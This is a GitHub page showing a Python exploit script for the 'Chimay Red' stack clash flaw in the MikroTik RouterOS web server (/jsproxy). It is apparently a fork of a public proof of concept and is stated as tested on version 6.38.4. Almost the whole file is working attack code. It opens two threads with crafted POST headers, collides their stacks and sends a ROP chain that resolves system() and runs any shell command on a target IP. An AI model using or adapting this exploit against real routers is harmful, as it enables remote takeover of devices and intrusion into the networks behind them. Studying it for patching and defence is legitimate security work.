forked from BigNerd95/Chimay-Red
-
Notifications
You must be signed in to change notification settings - Fork 3
/
StackClashROPsystem.py
executable file
·203 lines (154 loc) · 5.68 KB
/
StackClashROPsystem.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
#!/usr/bin/env python2
# Mikrotik Chimay Red Stack Clash Exploit by wsxarcher (based on BigNerd95 POC)
# tested on RouterOS 6.38.4 (x86)
# AST_STACKSIZE = 0x20000 (stack frame size per thread)
# ASLR enabled on libs only
# DEP enabled
import socket, time, sys, struct
from pwn import *
import ropgadget
context(arch="i386", os="linux")
gadgets = dict()
plt = dict()
strings = dict()
system_chunks = []
cmd_chunks = []
def makeHeader(num):
return bytes("POST /jsproxy HTTP/1.1\r\nContent-Length: ") + bytes(str(num)) + bytes("\r\n\r\n")
def makeSocket(ip, port):
s = socket.socket()
try:
s.connect((ip, port))
except:
print("Error connecting to socket")
sys.exit(-1)
print("Connected")
time.sleep(0.5)
return s
def socketSend(s, data):
try:
s.send(data)
except:
print("Error sending data")
sys.exit(-1)
print("Sent")
time.sleep(0.5)
def callRop(fun, args):
payload = struct.pack('<L', fun)
num = len(args)
if num == 0:
ret_gadget = gadgets['r']
elif num == 1:
ret_gadget = gadgets['p']
elif num == 2:
ret_gadget = gadgets['pp']
elif num == 3:
ret_gadget = gadgets['ppp']
elif num == 4:
ret_gadget = gadgets['pppp']
elif num == 5:
raise
payload += struct.pack('<L', ret_gadget)
for arg in args:
payload += struct.pack('<L', arg)
return payload
def strncpyRop(dst, src, length):
return callRop(plt["strncpy"] , [dst, src, length])
def dlsymRop(handle, symbol):
return callRop(plt["dlsym"], [handle, symbol])
# pwntools filters out JOP gadgets
# https://github.com/Gallopsled/pwntools/blob/5d537a6189be5131e63144e20556302606c5895e/pwnlib/rop/rop.py#L1074
def ropSearchJmp(elf, instruction):
oldargv = sys.argv
sys.argv = ['ropgadget', '--binary', elf.path, '--only', 'jmp']
args = ropgadget.args.Args().getArgs()
core = ropgadget.core.Core(args)
core.do_binary(elf.path)
core.do_load(0)
sys.argv = oldargv
for gadget in core._Core__gadgets:
address = gadget['vaddr'] - elf.load_addr + elf.address
if gadget['gadget'] == instruction:
return address
raise
def loadOffsets(binary, shellCmd):
elf = ELF(binary)
rop = ROP(elf)
# www PLT symbols
plt["strncpy"] = elf.plt['strncpy']
plt["dlsym"] = elf.plt['dlsym']
# Gadgets
gadgets['pppp'] = rop.search(regs=["ebx", "esi", "edi", "ebp"]).address
gadgets['ppp'] = rop.search(regs=["ebx", "ebp"], move=(4*4)).address
gadgets['pp'] = rop.search(regs=["ebx", "ebp"]).address
gadgets['p'] = rop.search(regs=["ebp"]).address
gadgets['r'] = rop.search().address
gadgets['jeax'] = ropSearchJmp(elf, "jmp eax")
system_chunks.extend(searchStringChunks(elf, "system\x00"))
cmd_chunks.extend(searchStringChunks(elf, shellCmd + "\x00"))
# random rw "unused" place to store strings
ctors = elf.get_section_by_name(".ctors").header.sh_addr
strings['system'] = ctors
strings['cmd'] = ctors + 0xf
def createPayload(binary):
# ROP chain
exploit = generateStrncpyChain(strings['system'], system_chunks)
exploit += generateStrncpyChain(strings['cmd'], cmd_chunks)
exploit += dlsymRop(0, strings['system']) # eax = libc.system
exploit += struct.pack('<L', gadgets['jeax'])
exploit += struct.pack('<L', gadgets['p'])
exploit += struct.pack('<L', strings['cmd'])
# Random address because the server is automatically restarted after a crash
exploit += struct.pack('<L', 0x13371337)
return exploit
def generateStrncpyChain(dst, chunks):
chain = ""
offset = 0
for (address, length) in chunks:
chain += strncpyRop(dst + offset, address, length)
offset += length
return chain
def searchStringChunks(elf, string):
chunks = []
total = len(string)
if string == "":
raise
looking = string
while string != "":
results = [_ for _ in elf.search(looking)]
if len(results) > 0:
chunks.append((results[0], len(looking)))
string = string[len(looking):]
looking = string
else:
looking = looking[:-1]
check_length = 0
for (address, length) in chunks:
check_length = check_length + length
if check_length == total:
return chunks
else:
raise
def stackClash(ip, binary, shellCmd):
loadOffsets(binary, shellCmd)
# 1) Start 2 threads
# open 2 socket so 2 threads are created
s1 = makeSocket(ip, 80) # socket 1, thread A
s2 = makeSocket(ip, 80) # socket 2, thread B
# 2) Stack Clash
# 2.1) send post header with Content-Length 0x20900 to socket 1 (thread A)
socketSend(s1, makeHeader(0x29000)) # thanks to alloca, the Stack Pointer of thread A will point inside the stack frame of thread B (the post_data buffer will start from here)
# 2.2) send 0x700-0x14 bytes as post data to socket 1 (thread A)
socketSend(s1, b'A'*(0x1000-20)) # increase the post_data buffer pointer of thread A to a position where a return address of thread B will be saved
# 2.3) send post header with Content-Length 0x200 to socket 2 (thread B)
socketSend(s2, makeHeader(0x8000)) # thanks to alloca, the Stack Pointer of thread B will point where post_data buffer pointer of thread A is positioned
# 3) Create and send ROP chain
exploit = createPayload(binary)
socketSend(s1, exploit)
# 4) Start ROP chain
s2.close() # close socket 2 to return from the function of thread B and start ROP chain
if __name__ == "__main__":
if len(sys.argv) == 4:
stackClash(sys.argv[1], sys.argv[2], sys.argv[3])
else:
print("Usage: ./StackClashROPsystem.py IP binary shellcommand")